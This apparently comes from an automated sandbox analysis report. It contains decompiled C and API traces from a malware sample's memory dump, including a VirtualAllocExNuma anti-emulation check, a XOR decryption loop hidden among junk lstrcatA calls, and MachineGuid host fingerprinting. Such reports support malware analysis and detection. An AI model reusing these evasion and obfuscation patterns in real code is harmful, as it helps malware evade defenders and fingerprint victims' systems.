                                                                    • API ID: Sleep$AddressProc$Processlstrcat$EventExitLibraryLoad$AllocCreateCurrentNameNumaOpenUserVirtual
                                                                    • String ID:
                                                                    • API String ID: 1703151194-0
                                                                    • Opcode ID: 3122e4cef266a179cca372e35d30f7b1f5b3816ac801432eef7285d13c736a34
                                                                    • Instruction ID: 4a754e56d0df5ef1ada5544818f788e7de8f4aa0a1beda3296f1e8db3a8e38ef
                                                                    • Opcode Fuzzy Hash: 3122e4cef266a179cca372e35d30f7b1f5b3816ac801432eef7285d13c736a34
                                                                    • Instruction Fuzzy Hash: A631B8396119247BC3123FA1BC0D9CE3B29BF8B3157060965F24994071CBAC26869FEF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 185 42604e-426060 GetModuleHandleW 186 426062-42606a call 425d9b 185->186 187 42606b-4260b3 GetProcAddress * 4 185->187 189 4260b5-4260bc 187->189 190 4260cb-4260ea 187->190 189->190 193 4260be-4260c5 189->193 191 4260ef-4260fd TlsAlloc 190->191 195 426103-42610e TlsSetValue 191->195 196 4261c4 191->196 193->190 194 4260c7-4260c9 193->194 194->190 194->191 195->196 197 426114-42615a call 42312f EncodePointer * 4 call 42785f 195->197 198 4261c6-4261c8 196->198 203 4261bf call 425d9b 197->203 204 42615c-426179 DecodePointer FlsAlloc 197->204 203->196 204->203 206 42617b-42618d call 422019 204->206 206->203 209 42618f-4261a2 DecodePointer 206->209 209->203 211 4261a4-4261bd call 425dd8 GetCurrentThreadId 209->211 211->198
                                                                    C-Code - Quality: 56%
                                                                    			E0042604E(void* __ebx) {
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				_Unknown_base(*)()* _t7;
                                                                    				long _t10;
                                                                    				void* _t11;
                                                                    				int _t12;
                                                                    				void* _t14;
                                                                    				void* _t15;
                                                                    				void* _t16;
                                                                    				void* _t18;
                                                                    				intOrPtr* _t20;
                                                                    				intOrPtr _t21;
                                                                    				long _t26;
                                                                    				void* _t30;
                                                                    				struct HINSTANCE__* _t35;
                                                                    				intOrPtr* _t36;
                                                                    				void* _t39;
                                                                    				intOrPtr* _t41;
                                                                    				void* _t42;
                                                                    
                                                                    				_t30 = __ebx;
                                                                    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                    				if(_t35 != 0) {
                                                                    					 *0x4456b8 = GetProcAddress(_t35, "FlsAlloc");
                                                                    					 *0x4456bc = GetProcAddress(_t35, "FlsGetValue");
                                                                    					 *0x4456c0 = GetProcAddress(_t35, "FlsSetValue");
                                                                    					_t7 = GetProcAddress(_t35, "FlsFree");
                                                                    					__eflags =  *0x4456b8;
                                                                    					_t39 = TlsSetValue;
                                                                    					 *0x4456c4 = _t7;
                                                                    					if( *0x4456b8 == 0) {
                                                                    						L6:
                                                                    						 *0x4456bc = TlsGetValue;
                                                                    						 *0x4456b8 = E00425D5E;
                                                                    						 *0x4456c0 = _t39;
                                                                    						 *0x4456c4 = TlsFree;
                                                                    					} else {
                                                                    						__eflags =  *0x4456bc;
                                                                    						if( *0x4456bc == 0) {
                                                                    							goto L6;
                                                                    						} else {
                                                                    							__eflags =  *0x4456c0;
                                                                    							if( *0x4456c0 == 0) {
                                                                    								goto L6;
                                                                    							} else {
                                                                    								__eflags = _t7;
                                                                    								if(_t7 == 0) {
                                                                    									goto L6;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					_t10 = TlsAlloc();
                                                                    					 *0x443e08 = _t10;
                                                                    					__eflags = _t10 - 0xffffffff;
                                                                    					if(_t10 == 0xffffffff) {
                                                                    						L15:
                                                                    						_t11 = 0;
                                                                    						__eflags = 0;
                                                                    					} else {
                                                                    						_t12 = TlsSetValue(_t10,  *0x4456bc);
                                                                    						__eflags = _t12;
                                                                    						if(_t12 == 0) {
                                                                    							goto L15;
                                                                    						} else {
                                                                    							E0042312F();
                                                                    							_t41 = __imp__EncodePointer;
                                                                    							_t14 =  *_t41( *0x4456b8);
                                                                    							 *0x4456b8 = _t14;
                                                                    							_t15 =  *_t41( *0x4456bc);
                                                                    							 *0x4456bc = _t15;
                                                                    							_t16 =  *_t41( *0x4456c0);
                                                                    							 *0x4456c0 = _t16;
                                                                    							 *0x4456c4 =  *_t41( *0x4456c4);
                                                                    							_t18 = E0042785F();
                                                                    							__eflags = _t18;
                                                                    							if(_t18 == 0) {
                                                                    								L14:
                                                                    								E00425D9B();
                                                                    								goto L15;
                                                                    							} else {
                                                                    								_t36 = __imp__DecodePointer;
                                                                    								_t20 =  *_t36( *0x4456b8, E00425F1F); // executed
                                                                    								_t21 =  *_t20(); // executed
                                                                    								 *0x443e04 = _t21;
                                                                    								__eflags = _t21 - 0xffffffff;
                                                                    								if(_t21 == 0xffffffff) {
                                                                    									goto L14;
                                                                    								} else {
                                                                    									_t42 = E00422019(1, 0x214);
                                                                    									__eflags = _t42;
                                                                    									if(_t42 == 0) {
                                                                    										goto L14;
                                                                    									} else {
                                                                    										__eflags =  *((intOrPtr*)( *_t36()))( *0x4456c0,  *0x443e04, _t42);
                                                                    										if(__eflags == 0) {
                                                                    											goto L14;
                                                                    										} else {
                                                                    											_push(0);
                                                                    											_push(_t42);
                                                                    											E00425DD8(_t30, _t36, _t42, __eflags);
                                                                    											_t26 = GetCurrentThreadId();
                                                                    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                    											 *_t42 = _t26;
                                                                    											_t11 = 1;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					return _t11;
                                                                    				} else {
                                                                    					E00425D9B();
                                                                    					return 0;
                                                                    				}
                                                                    			}























                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0041FE99), ref: 00426056
                                                                    • __mtterm.LIBCMT ref: 00426062
                                                                      • Part of subcall function 00425D9B: DecodePointer.KERNEL32(00000001,004261C4,?,0041FE99), ref: 00425DAC
                                                                      • Part of subcall function 00425D9B: TlsFree.KERNEL32(00000001,004261C4,?,0041FE99), ref: 00425DC6
                                                                      • Part of subcall function 00425D9B: DeleteCriticalSection.KERNEL32(00000000,00000000,774FF3A0,?,004261C4,?,0041FE99), ref: 004278C6
                                                                      • Part of subcall function 00425D9B: _free.LIBCMT ref: 004278C9
                                                                      • Part of subcall function 00425D9B: DeleteCriticalSection.KERNEL32(00000001,774FF3A0,?,004261C4,?,0041FE99), ref: 004278F0
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00426078
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00426085
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00426092
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042609F
                                                                    • TlsAlloc.KERNEL32(?,0041FE99), ref: 004260EF
                                                                    • TlsSetValue.KERNEL32(00000000,?,0041FE99), ref: 0042610A
                                                                    • __init_pointers.LIBCMT ref: 00426114
                                                                    • EncodePointer.KERNEL32(?,0041FE99), ref: 00426125
                                                                    • EncodePointer.KERNEL32(?,0041FE99), ref: 00426132
                                                                    • EncodePointer.KERNEL32(?,0041FE99), ref: 0042613F
                                                                    • EncodePointer.KERNEL32(?,0041FE99), ref: 0042614C
                                                                    • DecodePointer.KERNEL32(00425F1F,?,0041FE99), ref: 0042616D
                                                                    • FlsAlloc.KERNELBASE(?,0041FE99), ref: 0042616F
                                                                    • __calloc_crt.LIBCMT ref: 00426182
                                                                    • DecodePointer.KERNEL32(00000000,?,0041FE99), ref: 0042619C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004261AE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Pointer$AddressEncodeProc$Decode$AllocCriticalDeleteSection$CurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                    • API String ID: 2049299755-3819984048
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 398 403b11-403b39 399 403b3c-403b41 398->399 399->399 400 403b43-403ba8 lstrcatA * 3 LocalAlloc lstrcatA * 6 399->400 401 403c11-403c30 lstrcatA * 3 400->401 402 403baa-403bb3 400->402 404 403c31-403c36 401->404 403 403bb6-403bd1 lstrcatA * 2 402->403 405 403bd3-403bdd 403->405 406 403bdf-403c0f lstrcatA * 2 403->406 404->404 407 403c38-403c4f call 41da9b 404->407 405->405 405->406 406->401 406->403
                                                                    C-Code - Quality: 90%
                                                                    			E00403B11(intOrPtr __ecx) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t52;
                                                                    				char* _t54;
                                                                    				void* _t62;
                                                                    				char* _t82;
                                                                    				char* _t91;
                                                                    				intOrPtr _t103;
                                                                    				signed int _t104;
                                                                    				void* _t105;
                                                                    				void* _t107;
                                                                    				void* _t108;
                                                                    				CHAR* _t117;
                                                                    				void* _t118;
                                                                    				void* _t121;
                                                                    				signed int _t122;
                                                                    				void* _t124;
                                                                    
                                                                    				_t122 = _t124 - 0x37c;
                                                                    				_t52 =  *0x443674; // 0x393162b1
                                                                    				 *(_t122 + 0x378) = _t52 ^ _t122;
                                                                    				_t103 = __ecx;
                                                                    				 *((intOrPtr*)(_t122 - 0x7c)) = __ecx;
                                                                    				_t107 = 0x3e8;
                                                                    				_t54 = _t122 - 0x70;
                                                                    				do {
                                                                    					 *_t54 = 0;
                                                                    					_t54 = _t54 + 1;
                                                                    					_t107 = _t107 - 1;
                                                                    				} while (_t107 != 0);
                                                                    				_t117 = "0";
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				_t8 = _t103 + 1; // 0x8
                                                                    				_t62 = LocalAlloc(0x40, _t8); // executed
                                                                    				 *(_t122 - 0x74) = _t62;
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				 *((char*)(_t103 +  *(_t122 - 0x74))) = 0;
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				_t104 = 0;
                                                                    				if( *((intOrPtr*)(_t122 - 0x7c)) > 0) {
                                                                    					 *((intOrPtr*)(_t122 - 0x80)) =  *((intOrPtr*)(_t122 + 0x384)) -  *(_t122 - 0x74);
                                                                    					do {
                                                                    						lstrcatA(_t122 - 0x70, _t117);
                                                                    						lstrcatA(_t122 - 0x70, _t117);
                                                                    						_t91 =  *((intOrPtr*)(_t122 + 0x388));
                                                                    						 *(_t122 - 0x78) =  *(_t122 - 0x78) & 0x00000000;
                                                                    						if( *_t91 != 0) {
                                                                    							do {
                                                                    								 *(_t122 - 0x78) =  *(_t122 - 0x78) + 1;
                                                                    							} while ( *((char*)( *(_t122 - 0x78) + _t91)) != 0);
                                                                    						}
                                                                    						_t113 =  *((intOrPtr*)(_t122 - 0x80));
                                                                    						 *( *(_t122 - 0x74) + _t104) =  *(_t104 %  *(_t122 - 0x78) +  *((intOrPtr*)(_t122 + 0x388))) ^  *( *((intOrPtr*)(_t122 - 0x80)) +  *(_t122 - 0x74) + _t104);
                                                                    						lstrcatA(_t122 - 0x70, _t117);
                                                                    						lstrcatA(_t122 - 0x70, _t117);
                                                                    						_t104 = _t104 + 1;
                                                                    					} while (_t104 <  *((intOrPtr*)(_t122 - 0x7c)));
                                                                    				}
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				lstrcatA(_t122 - 0x70, _t117);
                                                                    				_pop(_t118);
                                                                    				_pop(_t121);
                                                                    				_t108 = 0x3e8;
                                                                    				_t82 = _t122 - 0x70;
                                                                    				_pop(_t105);
                                                                    				do {
                                                                    					 *_t82 = 0;
                                                                    					_t82 = _t82 + 1;
                                                                    					_t108 = _t108 - 1;
                                                                    				} while (_t108 != 0);
                                                                    				return E0041DA9B( *(_t122 - 0x74), _t105,  *(_t122 + 0x378) ^ _t122, _t113, _t118, _t121);
                                                                    			}

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B53
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B5A
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B61
                                                                    • LocalAlloc.KERNELBASE(00000040,00000008,?,00000007,00000000), ref: 00403B69
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B77
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B7E
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B85
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B93
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B9A
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403BA1
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403BBB
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403BC2
                                                                    • lstrcatA.KERNEL32(?,00438004,?,?,00000007,00000000), ref: 00403C02
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403C09
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403C16
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403C1D
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403C24
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$AllocLocal
                                                                    • String ID:
                                                                    • API String ID: 261761639-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 88%
                                                                    			E0041537D(void* __edi, char* __esi) {
                                                                    				void* __ebx;
                                                                    				signed int _t18;
                                                                    				long _t23;
                                                                    				void* _t37;
                                                                    				void* _t41;
                                                                    				void* _t42;
                                                                    				char* _t43;
                                                                    				signed int _t44;
                                                                    				void* _t46;
                                                                    
                                                                    				_t43 = __esi;
                                                                    				_t42 = __edi;
                                                                    				_t44 = _t46 - 0x18c;
                                                                    				_t18 =  *0x443674; // 0x393162b1
                                                                    				 *(_t44 + 0x188) = _t18 ^ _t44;
                                                                    				 *(_t44 - 0x7c) = 0;
                                                                    				 *(_t44 - 0x7c) = 0xff;
                                                                    				 *(_t44 + 0x88) = 0;
                                                                    				E00426300(_t44 + 0x89, 0, 0xfe);
                                                                    				_t23 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119, _t44 - 0x80); // executed
                                                                    				if(_t23 == 0) {
                                                                    					RegQueryValueExA( *(_t44 - 0x80), "MachineGuid", 0, 0, _t44 + 0x88, _t44 - 0x7c); // executed
                                                                    				}
                                                                    				RegCloseKey( *(_t44 - 0x80));
                                                                    				CharToOemA(_t44 + 0x88, _t44 - 0x78);
                                                                    				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                    				 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                    				 *_t43 = 0;
                                                                    				E00404331(_t43, _t44 - 0x78);
                                                                    				_pop(_t37);
                                                                    				return E0041DA9B(_t43, _t37,  *(_t44 + 0x188) ^ _t44, _t41, _t42, _t43);
                                                                    			}

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 004153B8
                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 004153D4
                                                                    • RegQueryValueExA.KERNELBASE(?,MachineGuid,00000000,00000000,?,?,?,?,00000000), ref: 004153F3
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004153FC
                                                                    • CharToOemA.USER32(?,?), ref: 0041540D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                    • API String ID: 2235053359-1211650757
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 482 401000-401023 GetCurrentProcess VirtualAllocExNuma 483 401025-401026 ExitProcess 482->483 484 40102c-401042 VirtualAlloc 482->484 485 401044-401047 484->485 486 401049-40104f 484->486 485->486 487 401051-401071 call 426300 VirtualFree 486->487 488 401077-40107a 486->488 487->488
                                                                    C-Code - Quality: 32%
                                                                    			E00401000(void* __ecx) {
                                                                    				void* _t2;
                                                                    				void* _t3;
                                                                    				void* _t5;
                                                                    				void* _t11;
                                                                    
                                                                    				_t2 =  *0x44645c(GetCurrentProcess(), 0, 0x7d0, 0x3000, 0x40, 0); // executed
                                                                    				if(_t2 == 0) {
                                                                    					ExitProcess(0);
                                                                    				}
                                                                    				_t3 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
                                                                    				_t11 = _t3;
                                                                    				_push(_t3);
                                                                    				if(_t3 != 0x11) {
                                                                    					asm("cld");
                                                                    				}
                                                                    				asm("clc");
                                                                    				_pop(_t5);
                                                                    				if(_t11 != 0) {
                                                                    					E00426300(_t11, 0, 0x5e69ec0);
                                                                    					_push(0);
                                                                    					asm("cld");
                                                                    					return VirtualFree(_t11, 0x17c841c0, 0x8000);
                                                                    				}
                                                                    				return _t5;
                                                                    			}








                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 00401014
                                                                    • VirtualAllocExNuma.KERNELBASE(00000000,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 0040101B
                                                                    • ExitProcess.KERNEL32 ref: 00401026
                                                                    • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 00401036
                                                                    • _memset.LIBCMT ref: 0040105B
                                                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,-5D2021DD,-5D2011DF,000000D5), ref: 00401071
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                    • String ID:
                                                                    • API String ID: 1859398019-0
                                                                    • Opcode ID: 17e8577ee365702da105d7d3bc05d200fb51b90a0ea4332338977c8909b93651
                                                                    • Instruction ID: 0be6df4a117c95e00e7a085d85633bddf6ec25a758a887222351dc0cae897ef5
                                                                    • Opcode Fuzzy Hash: 17e8577ee365702da105d7d3bc05d200fb51b90a0ea4332338977c8909b93651
                                                                    • Instruction Fuzzy Hash: F3F022F66012203BE6102B722CCCFAB1A8CDB07BA5F120039F605E3252C6398C0482BC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 491 41e24d-41e255 492 41e264-41e26f call 41dae4 491->492 495 41e271-41e272 492->495 496 41e257-41e262 call 4235e2 492->496 496->492 499 41e273-41e284 496->499 500 41e2b2-41e2cc call 41dc85 call 41ff86 499->500 501 41e286-41e2b1 call 41db78 call 41ed20 499->501 501->500
                                                                    C-Code - Quality: 93%
                                                                    			E0041E24D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                    				char* _v8;
                                                                    				signed int _v16;
                                                                    				char _v20;
                                                                    				void* __ebp;
                                                                    				void* _t34;
                                                                    				signed int _t35;
                                                                    				signed int _t39;
                                                                    				intOrPtr _t42;
                                                                    				intOrPtr _t44;
                                                                    				void* _t51;
                                                                    				intOrPtr* _t54;
                                                                    				signed int _t59;
                                                                    				signed int _t60;
                                                                    				void* _t63;
                                                                    				void* _t64;
                                                                    				void* _t66;
                                                                    				intOrPtr* _t68;
                                                                    
                                                                    				_t66 = __esi;
                                                                    				_t64 = __edi;
                                                                    				_t63 = __edx;
                                                                    				_t51 = __ebx;
                                                                    				while(1) {
                                                                    					_t34 = E0041DAE4(_t63, _t64, _t66, _a4); // executed
                                                                    					if(_t34 != 0) {
                                                                    						return _t34;
                                                                    					}
                                                                    					_t35 = E004235E2(_t34, _a4);
                                                                    					__eflags = _t35;
                                                                    					if(_t35 == 0) {
                                                                    						__eflags =  *0x444cbc & 0x00000001;
                                                                    						if(( *0x444cbc & 0x00000001) == 0) {
                                                                    							 *0x444cbc =  *0x444cbc | 0x00000001;
                                                                    							__eflags =  *0x444cbc;
                                                                    							_push(1);
                                                                    							_v8 = "bad allocation";
                                                                    							E0041DB78(0x444cb0,  &_v8);
                                                                    							 *0x444cb0 = 0x435264;
                                                                    							E0041ED20( *0x444cbc, 0x434f95);
                                                                    						}
                                                                    						_t54 =  &_v20;
                                                                    						E0041DC85(_t54, 0x444cb0);
                                                                    						_v20 = 0x435264;
                                                                    						E0041FF86( &_v20, 0x440c30);
                                                                    						asm("int3");
                                                                    						_t39 = _v16;
                                                                    						_push(0x435264);
                                                                    						_t68 = _t54;
                                                                    						 *((char*)(_t68 + 0xc)) = 0;
                                                                    						__eflags = _t39;
                                                                    						if(__eflags != 0) {
                                                                    							 *_t68 =  *_t39;
                                                                    							_t32 = _t39 + 4; // 0x40427b
                                                                    							 *((intOrPtr*)(_t68 + 4)) =  *_t32;
                                                                    						} else {
                                                                    							_t42 = E00425F05(_t51, _t63, __eflags);
                                                                    							 *((intOrPtr*)(_t68 + 8)) = _t42;
                                                                    							 *_t68 =  *((intOrPtr*)(_t42 + 0x6c));
                                                                    							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t42 + 0x68));
                                                                    							__eflags =  *_t68 -  *0x443df8; // 0x4be11a0
                                                                    							if(__eflags != 0) {
                                                                    								_t60 =  *0x443bb0; // 0xfffffffe
                                                                    								__eflags =  *(_t42 + 0x70) & _t60;
                                                                    								if(__eflags == 0) {
                                                                    									 *_t68 = E00425CDC(_t51, _t63, 0x444cb0, _t68, __eflags);
                                                                    								}
                                                                    							}
                                                                    							__eflags =  *((intOrPtr*)(_t68 + 4)) -  *0x443ab8; // 0x4be1620
                                                                    							if(__eflags != 0) {
                                                                    								_t59 =  *0x443bb0; // 0xfffffffe
                                                                    								__eflags =  *( *((intOrPtr*)(_t68 + 8)) + 0x70) & _t59;
                                                                    								if(__eflags == 0) {
                                                                    									 *((intOrPtr*)(_t68 + 4)) = E0042555B(_t51, _t63, 0x444cb0, _t68, __eflags);
                                                                    								}
                                                                    							}
                                                                    							_t44 =  *((intOrPtr*)(_t68 + 8));
                                                                    							__eflags =  *(_t44 + 0x70) & 0x00000002;
                                                                    							if(( *(_t44 + 0x70) & 0x00000002) == 0) {
                                                                    								 *(_t44 + 0x70) =  *(_t44 + 0x70) | 0x00000002;
                                                                    								 *((char*)(_t68 + 0xc)) = 1;
                                                                    							}
                                                                    						}
                                                                    						return _t68;
                                                                    					} else {
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    			}





















                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0041E267
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • std::exception::exception.LIBCMT ref: 0041E29C
                                                                    • std::exception::exception.LIBCMT ref: 0041E2B6
                                                                    • __CxxThrowException@8.LIBCMT ref: 0041E2C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                    • String ID: bad allocation
                                                                    • API String ID: 615853336-2104205924
                                                                    • Opcode ID: 35add48db3884d93d6b6b3c8959d8c19555fcfa2340bbeec03df38053064f1d5
                                                                    • Instruction ID: f02bcdf9e2ef460cc2c5a1bb44f72186bc1d9eafe83eb6c468dc195947b8b5b5
                                                                    • Opcode Fuzzy Hash: 35add48db3884d93d6b6b3c8959d8c19555fcfa2340bbeec03df38053064f1d5
                                                                    • Instruction Fuzzy Hash: BAF04975900209A7DB00EF53EC42AEE37A8AB80308F18006FF80095181CFBC9A80CB4C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 78%
                                                                    			E00415F45(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t53;
                                                                    				intOrPtr _t70;
                                                                    				intOrPtr _t72;
                                                                    				void* _t74;
                                                                    
                                                                    				_t63 = __ecx;
                                                                    				_push(0xd8);
                                                                    				E0042083E(E0043457F, __ebx, __edi, __esi);
                                                                    				_t70 = __ecx;
                                                                    				 *((intOrPtr*)(_t74 - 0x34)) = 0;
                                                                    				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                                                                    				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                                    				 *((intOrPtr*)(_t74 - 0x38)) = __ecx;
                                                                    				 *((char*)(__ecx)) = 0;
                                                                    				 *((intOrPtr*)(_t74 - 0xe4)) = 0x43f688;
                                                                    				 *((intOrPtr*)(_t74 - 0xd4)) = 0x43f678;
                                                                    				 *((intOrPtr*)(_t74 - 0x84)) = 0x43f304;
                                                                    				_t72 = 3;
                                                                    				_push(_t74 - 0xcc);
                                                                    				 *((intOrPtr*)(_t74 - 4)) = 1;
                                                                    				_push(_t74 - 0xe4);
                                                                    				 *((intOrPtr*)(_t74 - 0x34)) = _t72;
                                                                    				E00414325(0, __ecx, _t72, 0); // executed
                                                                    				_t13 =  *((intOrPtr*)(_t74 - 0xd4)) + 4; // 0x50
                                                                    				 *((intOrPtr*)(_t74 +  *_t13 - 0xd4)) = 0x43f624;
                                                                    				_t17 =  *((intOrPtr*)(_t74 - 0xe4)) + 4; // 0x60
                                                                    				 *((intOrPtr*)(_t74 +  *_t17 - 0xe4)) = 0x43f62c;
                                                                    				 *((intOrPtr*)(_t74 - 4)) = 5;
                                                                    				_t22 =  *((intOrPtr*)(_t74 - 0xe4)) + 4; // 0x4401a8
                                                                    				 *((intOrPtr*)(_t74 +  *_t22 - 0xe4)) = 0x43f684;
                                                                    				_push(_t72);
                                                                    				_push(_t74 - 0xcc);
                                                                    				E00417359(0, _t72, 0);
                                                                    				_push( *((intOrPtr*)(_t74 + 8)));
                                                                    				_push(_t74 - 0xd4);
                                                                    				 *((intOrPtr*)(_t74 - 4)) = 6;
                                                                    				E00416879(0, _t63, _t70, _t72, 0);
                                                                    				_t53 = E00416C31(_t74 - 0xe4, _t74 - 0x30);
                                                                    				 *((char*)(_t74 - 4)) = 7;
                                                                    				E004042ED(_t70, _t53);
                                                                    				E00404354(_t74 - 0x30, 1, 0);
                                                                    				 *((char*)(_t74 - 4)) = 0;
                                                                    				E00416BF9(0, _t74 - 0x84, _t70, _t53, 0);
                                                                    				 *((intOrPtr*)(_t74 - 0x84)) = 0x43f2fc;
                                                                    				E0041D1C9(_t74 - 0x84);
                                                                    				return E00420888(0, _t70, _t53);
                                                                    			}








                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00415F4F
                                                                      • Part of subcall function 00414325: __EH_prolog3.LIBCMT ref: 0041432C
                                                                      • Part of subcall function 00417359: __EH_prolog3.LIBCMT ref: 00417360
                                                                      • Part of subcall function 00416879: __EH_prolog3_catch.LIBCMT ref: 00416880
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                      • Part of subcall function 00416BF9: __EH_prolog3.LIBCMT ref: 00416C00
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416052
